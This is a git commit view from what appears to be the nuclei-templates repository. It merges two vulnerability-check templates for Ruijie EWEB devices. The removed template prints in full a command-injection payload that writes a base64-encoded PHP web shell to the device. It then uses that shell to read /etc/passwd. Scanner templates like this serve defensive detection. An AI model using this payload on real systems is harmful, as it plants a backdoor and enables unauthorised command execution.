Merge pull request #5938 from projectdiscovery/merging-templates

Update CNVD-2021-09650.yaml
2022-11-01 18:57:57 +05:30 · 2022-11-01 18:57:57 +05:30 · af3aebba07
parent d8ae1ec5a3 a3f01fc9a3
commit af3aebba07
2 changed files with 4 additions and 45 deletions
--- a/cnvd/2021/CNVD-2021-09650.yaml
+++ b/cnvd/2021/CNVD-2021-09650.yaml
@ -1,12 +1,14 @@
 id: CNVD-2021-09650

 info:
-  name: Ruijie EWEB Gateway Platform - Remote Command Injection
-  author: daffainfo
+  name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
+  author: daffainfo,pikpikcu
  severity: critical
  description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
  reference:
    - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
+    - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
+    - https://www.ruijienetworks.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
--- a/vulnerabilities/ruijie/ruijie-networks-rce.yaml
+++ b/vulnerabilities/ruijie/ruijie-networks-rce.yaml
@ -1,43 +0,0 @@
-id: ruijie-networks-rce
-
-info:
-  name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
-  author: pikpikcu
-  description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution.
-  severity: critical
-  reference:
-    - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
-    - https://www.ruijienetworks.com
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
-    cwe-id: CWE-77
-  tags: ruijie,rce,network
-
-requests:
-  - raw:
-      - |
-        POST /guest_auth/guestIsUp.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
-
-        ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00
-
-      - |
-        GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-          - "nobody:x:0:0:"
-        part: body
-
-      - type: status
-        status:
-          - 200
-
-# Enhanced by mp on 2022/06/03